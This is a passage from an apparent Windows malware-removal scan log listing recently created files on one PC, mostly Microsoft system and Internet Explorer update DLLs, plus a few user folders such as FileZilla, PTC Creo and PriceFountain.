2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 22:45 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe 2015-04-17 10:01 - 2015-03-16 22:45 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe 2015-04-17 10:01 - 2015-03-16 22:43 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 22:43 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 22:43 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 22:43 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll 2015-04-17 10:01 - 2015-03-12 23:32 - 24980480 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2015-04-17 10:01 - 2015-03-12 23:25 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2015-04-17 10:01 - 2015-03-12 23:25 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll 2015-04-17 10:01 - 2015-03-12 23:09 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2015-04-17 10:01 - 2015-03-12 23:08 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2015-04-17 10:01 - 2015-03-12 23:08 - 00417280 _____ (Microsoft Corporation) C:\Windows\system32\html.iec 2015-04-17 10:01 - 2015-03-12 23:08 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll 2015-04-17 10:01 - 2015-03-12 23:07 - 02886144 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2015-04-17 10:01 - 2015-03-12 23:06 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2015-04-17 10:01 - 2015-03-12 23:00 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2015-04-17 10:01 - 2015-03-12 22:59 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2015-04-17 10:01 - 2015-03-12 22:55 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2015-04-17 10:01 - 2015-03-12 22:54 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2015-04-17 10:01 - 2015-03-12 22:54 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe 2015-04-17 10:01 - 2015-03-12 22:53 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2015-04-17 10:01 - 2015-03-12 22:50 - 06025216 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2015-04-17 10:01 - 2015-03-12 22:44 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2015-04-17 10:01 - 2015-03-12 22:42 - 19695616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2015-04-17 10:01 - 2015-03-12 22:42 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2015-04-17 10:01 - 2015-03-12 22:40 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2015-04-17 10:01 - 2015-03-12 22:32 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2015-04-17 10:01 - 2015-03-12 22:28 - 00503296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2015-04-17 10:01 - 2015-03-12 22:28 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll 2015-04-17 10:01 - 2015-03-12 22:27 - 00340992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec 2015-04-17 10:01 - 2015-03-12 22:27 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2015-04-17 10:01 - 2015-03-12 22:27 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll 2015-04-17 10:01 - 2015-03-12 22:26 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2015-04-17 10:01 - 2015-03-12 22:26 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll 2015-04-17 10:01 - 2015-03-12 22:23 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2015-04-17 10:01 - 2015-03-12 22:22 - 02278400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2015-04-17 10:01 - 2015-03-12 22:20 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2015-04-17 10:01 - 2015-03-12 22:20 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll 2015-04-17 10:01 - 2015-03-12 22:17 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2015-04-17 10:01 - 2015-03-12 22:16 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2015-04-17 10:01 - 2015-03-12 22:15 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll 2015-04-17 10:01 - 2015-03-12 22:08 - 00720384 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2015-04-17 10:01 - 2015-03-12 22:07 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2015-04-17 10:01 - 2015-03-12 22:06 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2015-04-17 10:01 - 2015-03-12 22:05 - 02125824 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2015-04-17 10:01 - 2015-03-12 22:05 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2015-04-17 10:01 - 2015-03-12 22:01 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll 2015-04-17 10:01 - 2015-03-12 22:00 - 14397440 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2015-04-17 10:01 - 2015-03-12 21:57 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll 2015-04-17 10:01 - 2015-03-12 21:56 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2015-04-17 10:01 - 2015-03-12 21:54 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2015-04-17 10:01 - 2015-03-12 21:49 - 04305408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2015-04-17 10:01 - 2015-03-12 21:45 - 02358784 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2015-04-17 10:01 - 2015-03-12 21:44 - 00689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2015-04-17 10:01 - 2015-03-12 21:43 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2015-04-17 10:01 - 2015-03-12 21:42 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll 2015-04-17 10:01 - 2015-03-12 21:34 - 12825600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2015-04-17 10:01 - 2015-03-12 21:33 - 01548288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2015-04-17 10:01 - 2015-03-12 21:22 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2015-04-17 10:01 - 2015-03-12 21:20 - 01888256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2015-04-17 10:01 - 2015-03-12 21:16 - 01311232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2015-04-17 10:01 - 2015-03-12 21:14 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll 2015-04-17 10:01 - 2015-03-09 22:25 - 01882624 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll 2015-04-17 10:01 - 2015-03-09 22:21 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll 2015-04-17 10:01 - 2015-03-09 22:08 - 01237504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll 2015-04-17 10:01 - 2015-03-09 22:05 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll 2015-04-17 10:01 - 2015-03-05 00:12 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll 2015-04-17 10:01 - 2015-03-04 23:05 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll 2015-04-17 10:01 - 2015-02-24 22:18 - 00754688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys 2015-04-17 10:01 - 2015-01-30 18:56 - 00459336 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys 2015-04-17 10:01 - 2015-01-27 18:36 - 01239720 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe 2015-04-17 09:58 - 2015-03-03 23:55 - 00367552 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys 2015-04-17 09:58 - 2015-03-03 23:41 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\clfsw32.dll 2015-04-17 09:58 - 2015-03-03 23:10 - 00058880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\clfsw32.dll 2015-04-16 12:42 - 2015-04-16 12:42 - 00000000 ____D () C:\Users\tboe\AppData\Local\Adobe 2015-04-16 10:21 - 2015-04-23 14:00 - 00000070 _____ () C:\Users\tboe\AppData\Roaming\WB.CFG 2015-04-16 10:19 - 2015-04-16 10:19 - 00000000 ____D () C:\Users\tboe\AppData\Local\CrashDumps 2015-04-06 21:49 - 2014-06-30 17:24 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll 2015-04-06 21:49 - 2014-06-30 17:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll 2015-04-06 21:49 - 2014-06-06 01:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe 2015-04-06 21:49 - 2014-06-06 01:12 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe 2015-04-06 21:49 - 2014-03-09 16:48 - 01389208 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe 2015-04-06 21:49 - 2014-03-09 16:48 - 00171160 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll 2015-04-06 21:49 - 2014-03-09 16:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe 2015-04-06 21:49 - 2014-03-09 16:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll 2015-04-06 18:42 - 2015-04-17 10:19 - 00000600 _____ () C:\Users\tboe\AppData\Local\PUTTY.RND 2015-04-06 18:35 - 2015-04-17 10:19 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\FileZilla 2015-04-06 18:35 - 2015-04-06 18:35 - 06420600 _____ (Tim Kosse) C:\Users\tboe\Downloads\FileZilla_3.10.3_win64-setup [1].exe 2015-04-06 18:35 - 2015-04-06 18:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileZilla FTP Client 2015-04-06 18:35 - 2015-04-06 18:35 - 00000000 ____D () C:\Program Files\FileZilla FTP Client 2015-04-06 18:34 - 2015-04-06 18:34 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\PriceFountain 2015-04-06 18:32 - 2015-04-06 18:32 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\Macromedia 2015-04-06 18:28 - 2015-04-06 18:28 - 00000000 __SHD () C:\Users\tboe\AppData\Local\EmieUserList 2015-04-06 18:28 - 2015-04-06 18:28 - 00000000 __SHD () C:\Users\tboe\AppData\Local\EmieSiteList 2015-04-06 18:28 - 2015-04-06 18:28 - 00000000 __SHD () C:\Users\tboe\AppData\Local\EmieBrowserModeList 2015-04-06 18:27 - 2015-04-16 11:20 - 00000000 ____D () C:\PTC_Projects 2015-04-06 18:25 - 2015-04-06 18:25 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\PTC 2015-04-06 18:25 - 2015-04-06 18:25 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\NVIDIA 2015-04-06 18:25 - 2015-04-06 18:25 - 00000000 ____D () C:\Users\tboe\AppData\Local\PTC 2015-04-06 18:23 - 2015-04-06 18:25 - 00001731 _____ () C:\Users\tboe\Desktop\Creo2_Flex3.lnk 2015-04-06 18:22 - 2015-04-23 14:01 - 00070872 _____ () C:\Users\tboe\AppData\Local\GDIPFONTCACHEV1.DAT 2015-04-06 18:22 - 2015-04-06 18:22 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\Intel Corporation 2015-04-06 18:21 - 2015-04-16 12:42 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\Adobe 2015-04-06 18:21 - 2015-04-06 18:21 - 00001419 _____ () C:\Users\tboe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2015-04-06 18:21 - 2015-04-06 18:21 - 00000020 ___SH () C:\Users\tboe\ntuser.ini 2015-04-06 18:21 - 2015-04-06 18:21 - 00000000 ____D () C:\Users\tboe\Documents\My Received Files 2015-04-06 18:21 - 2015-04-06 18:21 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\PC Tech Hotline 2015-04-06 18:21 - 2015-04-06 18:21 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\Intel 2015-04-06 18:21 - 2015-04-06 18:21 - 00000000 ____D () C:\Users\tboe\AppData\Local\VirtualStore 2015-04-06 18:21 - 2015-04-06 18:21 - 00000000 ____D () C:\Users\tboe\AppData\Local\NVIDIA 2015-04-06 18:21 - 2015-04-06 18:21 - 00000000 ____D () C:\Users\tboe 2015-04-06 18:21 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\tboe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories 2015-04-06 18:21 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\tboe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance 2015-04-03 10:25 - 2015-04-03 10:25 - 00000790 _____ () C:\Users\Public\Documents\trail.txt.2 2015-04-03 10:24 - 2015-04-03 10:24 - 00000426 _____ () C:\Users\Public\Documents\mech_trl.txt.2 2015-04-03 10:16 - 2015-04-03 10:16 - 00000426 _____ () C:\Users\Public\Documents\mech_trl.txt.1 2015-04-03 10:14 - 2015-04-03 10:25 - 00000112 _____ () C:\Users\Public\Documents\std.err 2015-04-03 10:14 - 2015-04-03 10:15 - 00001200 _____ () C:\Users\Public\Documents\trail.txt.1 2015-04-03 09:15 - 2015-04-03 09:15 - 00000000 ____D () C:\Windows\system32\appmgmt 2015-04-03 09:12 - 2015-04-03 09:12 - 00002002 _____ () C:\Users\Public\Desktop\Structure.lnk 2015-04-03 09:12 - 2015-04-03 09:12 - 00001992 _____ () C:\Users\Public\Desktop\Thermal.lnk 2015-04-03 09:12 - 2015-04-03 09:12 - 00001830 _____ () C:\Users\Public\Desktop\Creo Simulate 2.0.lnk 2015-04-03 09:11 - 2015-04-03 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PTC Creo 2015-04-03 08:48 - 2015-02-19 23:41 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll 2015-04-03 08:48 - 2015-02-19 23:40 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll 2015-04-03 08:48 - 2015-02-19 23:40 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll 2015-04-03 08:48 - 2015-02-19 23:40 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll 2015-04-03 08:48 - 2015-02-19 23:13 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll 2015-04-03 08:48 - 2015-02-19 23:13 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll 2015-04-03 08:48 - 2015-02-19 23:13 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll 2015-04-03 08:48 - 2015-02-19 23:12 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll 2015-04-03 08:48 - 2015-02-19 22:29 - 00372224 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll 2015-04-03 08:48 - 2015-02-19 22:09 - 00299008 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll 2015-04-03 08:48 - 2015-02-02 22:34 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi 2015-04-03 08:48 - 2015-02-02 22:34 - 00094656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys 2015-04-03 08:48 - 2015-02-02 22:33 - 00616360 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi 2015-04-03 08:48 - 2015-02-02 22:31 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx 2015-04-03 08:48 - 2015-02-02 22:31 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL 2015-04-03 08:48 - 2015-02-02 22:30 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00680960 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe 2015-04-03 08:48 - 2015-02-02 22:30 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe 2015-04-03 08:48 - 2015-02-02 22:30 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe 2015-04-03 08:48 - 2015-02-02 22:30 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll 2015-04-03 08:48 - 2015-02-02 22:30 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe 2015-04-03 08:48 - 2015-02-02 22:30 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe 2015-04-03 08:48 - 2015-02-02 22:30 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe 2015-04-03 08:48 - 2015-02-02 22:30 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe 2015-04-03 08:48 - 2015-02-02 22:29 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll 2015-04-03 08:48 - 2015-02-02 22:19 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys 2015-04-03 08:48 - 2015-02-02 22:12 - 11411968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00103936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll 2015-04-03 08:48 - 2015-02-02 22:12 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx 2015-04-03 08:48 - 2015-02-02 22:12 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll 2015-04-03 08:48 - 2015-02-02 22:11 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL 2015-04-03 08:48 - 2015-02-02 22:11 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe 2015-04-03 08:48 - 2015-02-02 22:11 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe 2015-04-03 08:48 - 2015-02-02 21:32 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys 2015-04-03 08:48 - 2015-01-08 22:14 - 00950272 _____ (Microsoft Corporation) C:\Windows\system32\perftrack.dll 2015-04-03 08:48 - 2015-01-08 22:14 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\wdi.dll 2015-04-03 08:48 - 2015-01-08 22:14 - 00029696 _____ (Microsoft Corporation) C:\Windows\system32\powertracker.dll 2015-04-03 08:48 - 2015-01-08 21:48 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdi.dll 2015-04-03 08:48 - 2014-12-11 12:47 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe 2015-04-03 08:48 - 2014-10-31 17:24 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe 2015-04-03 08:48 - 2014-08-01 06:53 - 01031168 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll 2015-04-03 08:48 - 2014-08-01 06:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSWorkspace.dll 2015-04-03 08:48 - 2014-06-27 19:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe 2015-04-03 08:48 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll 2015-04-03 08:48 - 2011-04-09 01:58 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe 2015-04-03 08:48 - 2011-04-09 00:56 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe 2015-04-03 08:47 - 2015-02-02 22:28 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll 2015-04-03 08:47 - 2015-02-02 22:09 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll 2015-04-03 08:47 - 2014-12-18 22:06 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll 2015-04-03 08:47 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll 2015-04-03 08:47 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll 2015-04-03 08:47 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll 2015-04-03 08:47 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll 2015-04-03 08:47 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll 2015-04-03 08:47 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll 2015-04-03 08:46 - 2015-02-25 22:25 - 03204096 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2015-04-03 08:46 - 2015-02-13 00:26 - 12875264 _____ (Microsoft Corporation) 